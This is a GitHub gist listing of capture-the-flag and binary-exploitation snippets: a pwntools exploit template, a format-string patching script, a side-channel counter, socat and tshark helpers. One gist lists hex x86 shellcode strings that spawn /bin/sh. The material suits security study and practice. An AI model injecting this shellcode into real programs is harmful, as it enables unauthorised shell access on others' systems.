grittyninja
/ pwnbox Dockerfile
Last active
June 24, 2017 17:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # install https://github.com/Lokaltog/powerline-fonts | |
| # save as 'Dockerfile' | |
| # run docker without sudo, run 'sudo gpasswd -a $USER docker' | |
| # docker build -t pwnbox . | |
| FROM gliderlabs/alpine:3.4 | |
| # update packages | |
| RUN apk update |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %s/h\n\?mov\s\+\[[a-z]\{3}+[a-zA-Z0-9_]\+\],\s/, 0x/e | %s/h//e | %s/mov\s\+\[[a-z]\{3}+[a-zA-Z0-9_]\+\],\s/0x/e |
grittyninja
/ fmtstr_patch.py
Created
October 30, 2016 12:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Author : Cyber Security IPB | |
| Date : October 28, 2016 | |
| Dependencies : pwntools | |
| Script ini bisa mengganti pemanggilan fungsi dari suatu binary ELF | |
| (32 / 64 bit). Misalnya mengubah dari "call printf" menjadi call "puts" | |
| untuk menambal celah format string exploit. Atau mengubah pemanggilan | |
| fungsi yang ada di program menjadi fungsi lain. |
grittyninja
/ gist:4608b40dc8c91740494db6a28c53c1cc
Created
September 26, 2016 07:02
pintools - count
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import os | |
| import string | |
| import operator | |
| import commands | |
| charset = "_{}" + string.ascii_letters + string.digits | |
| offset = 24 # true condition - false condition | |
| tmp = "" | |
| cm = "" | |
| def main(): |
grittyninja
/ exploit.template.py
Created
August 29, 2016 17:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| from pwn import * | |
| def exploit(r): | |
| # craft exploit here | |
| if __name__ == "__main__": | |
| log.info("%s HOST PORT" % sys.argv[0]) | |
| if len(sys.argv) > 1: | |
| r = remote(sys.argv[1], int(sys.argv[2])) |
grittyninja
/ prism.test.html
Created
August 29, 2016 15:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <pre><code class="line-numbers language-python"># Author: hrdn | |
| test = ["H","E","L","L","O"] | |
| "".join(test) | |
| </code> | |
| </pre> |
grittyninja
/ BinaryManipulation.py
Created
August 24, 2016 02:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 2's Complements: | |
| -(num) & (2**nbit - 1) |
grittyninja
/ Local Pwning
Last active
August 23, 2016 15:05
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo socat TCP-LISTEN:31337,reuseaddr,fork EXEC:./pwnme,su=nobody |
grittyninja
/ Linux Shellcode Intel x86-64
Last active
August 12, 2016 01:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [[ Spawning /bin/sh ]] | |
| #### BY SHELLSTORM #### | |
| # 32 bit | |
| ## 23 bytes | |
| "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" | |
| ## 21 bytes | |
| "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" |
grittyninja
/ calc_packet.sh
Last active
August 19, 2016 07:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "[+] TCP STREAM" | |
| STREAM=0 | |
| while true; do | |
| IP=$(tshark -r tmp_einqrztl_10.pcapng -Y "tcp.stream eq $STREAM" -T fields -e ip.dst | sed -e 's/10.0.2.15//g' | sort | uniq | tr -d '\n') | |
| if [ $IP ]; then | |
| echo "[+] Extracting statistics data from Conversation $STREAM" | |
| # CALCULATE HERE | |
| else |